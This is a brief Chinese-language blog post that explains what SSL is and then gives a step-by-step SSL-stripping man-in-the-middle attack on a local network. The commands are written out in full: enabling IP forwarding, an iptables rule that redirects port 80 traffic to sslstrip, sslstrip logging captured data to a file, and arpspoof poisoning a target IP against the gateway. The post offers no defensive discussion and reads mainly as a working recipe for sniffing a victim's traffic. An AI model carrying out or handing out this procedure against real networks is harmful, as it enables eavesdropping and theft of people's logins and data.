HTTPS反向代理嗅探
两年前的文章,一直在本地笔记放着,发现博客上竟然没存。发出来。
先说说什么是SSL:
SSL是Secure Socket Layer的简称,中文意思是安全套接层,由NetScape公司开发,用来保障在Internet上的数据传输安全,确保数据在网络的传输过程中不被截取和窃听。被广泛用于Web浏览器与服务器之间的身份认证和数据加密传输。
SSL协议提供的服务主要有:
- 认证用户和服务器,确保数据发送到正确的客户和服务器。
- 加密数据,防止中间人窃取。
- 维护数据的完整性,确保数据在传输过程中无法被改变。
此次实验用到了两款工具,SSLstrip和Arpspoof。
把网卡改成转发模式:
echo '1' > /proc/sys/net/ipv4/ip_forward
在iptables里添加规则,把所有http数据导入到sslstrip中。
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
然后开启sslstrip:
sslstrip -a -l <listenPort> -w XXX.log(保存的文件名)
然后重新开一个终端,使用arpspoof进行网络欺骗:
arpspoof -i eth0(你的网卡) -t 192.168.1.X(这个是你的目标IP) 192.168.1.1(这个是你的网关)
然后一半在欺骗大概1分钟之后,你就能拦截到数据了。打开你的sslstrip的文件夹,里面有一个你设置的XXX.log文件,就是嗅探到的数据。
注:嗅探时,sslstrip会报错,不用管它。如果没嗅探到数据,检查完步骤语法什么的没有出错后,可能是被拦截没有欺骗成功。
本文发于:安全大可文章转载请注明出处:http://im404.cnblogs.com
相关事宜请联系:im404@qq.com